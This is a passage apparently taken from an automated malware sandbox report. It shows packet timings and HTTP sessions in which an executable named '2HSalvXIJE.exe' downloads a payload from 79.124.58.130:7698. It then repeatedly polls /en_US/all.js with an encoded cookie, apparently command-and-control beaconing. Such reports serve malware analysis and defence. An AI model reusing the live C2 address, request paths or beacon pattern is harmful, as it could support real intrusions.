Oct 23, 2024 17:29:24.720781088 CEST	7698	49927	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:25.607146978 CEST	7698	49927	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:25.607570887 CEST	49927	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:25.723072052 CEST	49927	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:25.723505974 CEST	49928	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:25.729088068 CEST	7698	49927	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:25.729187012 CEST	7698	49928	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:25.729234934 CEST	49927	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:25.729310989 CEST	49928	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:25.729501009 CEST	49928	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:25.734819889 CEST	7698	49928	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:26.617001057 CEST	7698	49928	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:26.617072105 CEST	49928	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:26.724432945 CEST	49928	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:26.724935055 CEST	49929	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:26.730593920 CEST	7698	49928	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:26.730609894 CEST	7698	49929	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:26.730648994 CEST	49928	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:26.730709076 CEST	49929	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:26.730823994 CEST	49929	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:26.736273050 CEST	7698	49929	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:27.621041059 CEST	7698	49929	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:27.621174097 CEST	49929	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:27.767234087 CEST	7698	49929	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:27.767410040 CEST	49929	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:27.818028927 CEST	49929	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:27.818821907 CEST	49930	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:27.823470116 CEST	7698	49929	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:27.824388027 CEST	7698	49930	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:27.824456930 CEST	49930	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:27.824687004 CEST	49930	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:27.830679893 CEST	7698	49930	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:29.410049915 CEST	7698	49930	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:29.410291910 CEST	7698	49930	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:29.410309076 CEST	7698	49930	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:29.410434008 CEST	49930	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:29.410434961 CEST	49930	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:29.410554886 CEST	49930	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:29.411906004 CEST	7698	49930	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:29.415617943 CEST	49930	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:29.417695045 CEST	7698	49930	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:29.520548105 CEST	49931	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:29.526421070 CEST	7698	49931	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:29.527616024 CEST	49931	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:29.531538963 CEST	49931	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:29.537477016 CEST	7698	49931	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:30.407187939 CEST	7698	49931	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:30.407262087 CEST	49931	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:30.521827936 CEST	49931	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:30.522367954 CEST	49932	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:30.527477980 CEST	7698	49931	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:30.527543068 CEST	49931	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:30.527672052 CEST	7698	49932	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:30.527776957 CEST	49932	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:30.527976990 CEST	49932	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:30.533246040 CEST	7698	49932	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:31.445987940 CEST	7698	49932	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:31.447588921 CEST	49932	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:31.551163912 CEST	49932	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:31.551510096 CEST	49933	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:31.556976080 CEST	7698	49933	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:31.557869911 CEST	7698	49932	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:31.559587002 CEST	49933	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:31.559700012 CEST	49932	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:31.559772015 CEST	49933	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:31.565155983 CEST	7698	49933	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:32.450093031 CEST	7698	49933	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:32.450166941 CEST	49933	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:32.568555117 CEST	49933	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:32.568994045 CEST	49934	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:32.574508905 CEST	7698	49934	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:32.574582100 CEST	49934	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:32.574842930 CEST	49934	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:32.575293064 CEST	7698	49933	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:32.575345993 CEST	49933	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:32.581095934 CEST	7698	49934	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:33.473752022 CEST	7698	49934	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:33.474198103 CEST	49934	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:33.583009958 CEST	49934	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:33.583679914 CEST	49935	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:33.588977098 CEST	7698	49934	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:33.589045048 CEST	7698	49935	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:33.589066029 CEST	49934	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:33.589140892 CEST	49935	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:33.589274883 CEST	49935	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:33.594686031 CEST	7698	49935	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:34.478450060 CEST	7698	49935	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:34.478533030 CEST	49935	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:34.590830088 CEST	49935	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:34.591355085 CEST	49936	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:34.597034931 CEST	7698	49935	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:34.597060919 CEST	7698	49936	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:34.597090006 CEST	49935	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:34.597147942 CEST	49936	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:34.597760916 CEST	49936	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:34.603099108 CEST	7698	49936	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:35.677597046 CEST	7698	49936	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:35.677905083 CEST	7698	49936	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:35.677989006 CEST	49936	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:35.678064108 CEST	7698	49936	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:35.679476023 CEST	49936	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:35.679533958 CEST	49936	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:35.787142992 CEST	49937	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:35.961424112 CEST	7698	49936	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:35.962968111 CEST	7698	49936	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:35.963027000 CEST	7698	49937	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:35.963059902 CEST	49936	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:35.963188887 CEST	49937	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:35.964374065 CEST	49937	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:35.969902992 CEST	7698	49937	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:36.868371010 CEST	7698	49937	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:36.868472099 CEST	49937	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:36.990329981 CEST	49937	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:36.991332054 CEST	49938	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:36.996615887 CEST	7698	49937	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:36.996681929 CEST	49937	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:36.996757984 CEST	7698	49938	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:36.997137070 CEST	49938	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:36.997137070 CEST	49938	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:37.002760887 CEST	7698	49938	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:37.890084028 CEST	7698	49938	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:37.890343904 CEST	49938	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:38.005637884 CEST	49938	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:38.005903959 CEST	49939	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:38.011900902 CEST	7698	49938	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:38.012001038 CEST	49938	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:38.012331963 CEST	7698	49939	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:38.012414932 CEST	49939	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:38.012576103 CEST	49939	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:38.017865896 CEST	7698	49939	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:38.901550055 CEST	7698	49939	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:38.901643991 CEST	49939	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:39.005274057 CEST	49939	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:39.005595922 CEST	49940	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:39.011061907 CEST	7698	49940	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:39.011123896 CEST	49940	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:39.011286020 CEST	49940	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:39.012094021 CEST	7698	49939	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:39.012155056 CEST	49939	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:39.016751051 CEST	7698	49940	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:39.897087097 CEST	7698	49940	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:39.897506952 CEST	49940	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:29:40.043263912 CEST	7698	49940	79.124.58.130	192.168.2.8
Oct 23, 2024 17:29:40.043334961 CEST	49940	7698	192.168.2.8	79.124.58.130

HTTP Request Dependency Graph

79.124.58.130:7698

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:35.307538986 CEST	204	OUT	GET /aiHK HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; msn OptimizedIE8;ENUS) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:36.203211069 CEST	120	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:36 GMT Content-Type: application/octet-stream Content-Length: 307271

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:38.083517075 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:38.969944000 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49707	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:39.086630106 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:39.967709064 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49708	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:40.101891041 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:40.996090889 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49709	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:41.118092060 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:42.007652998 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49710	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:42.118772030 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:43.012305021 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49711	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:43.133676052 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:44.025127888 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:43 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49712	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:44.134239912 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:45.024177074 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49713	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:45.133474112 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:46.034898996 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49714	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:46.150257111 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:47.104691029 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49715	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:47.223903894 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:48.111269951 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49716	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:48.228116989 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:49.120256901 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49718	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:49.227822065 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:50.115564108 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49720	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:50.261828899 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:51.148080111 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49722	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:51.258907080 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:52.151078939 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49723	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:52.258929014 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:53.159298897 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49724	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

Timestamp	Bytes transferred	Direction	Data
Oct 23, 2024 17:25:53.274023056 CEST	365	OUT	GET /en_US/all.js HTTP/1.1 Accept: / Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Host: 79.124.58.130:7698 Connection: Keep-Alive Cache-Control: no-cache
Oct 23, 2024 17:25:54.174360991 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 23 Oct 2024 15:25:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49725	79.124.58.130	7698	7552	C:\Users\user\Desktop\2HSalvXIJE.exe

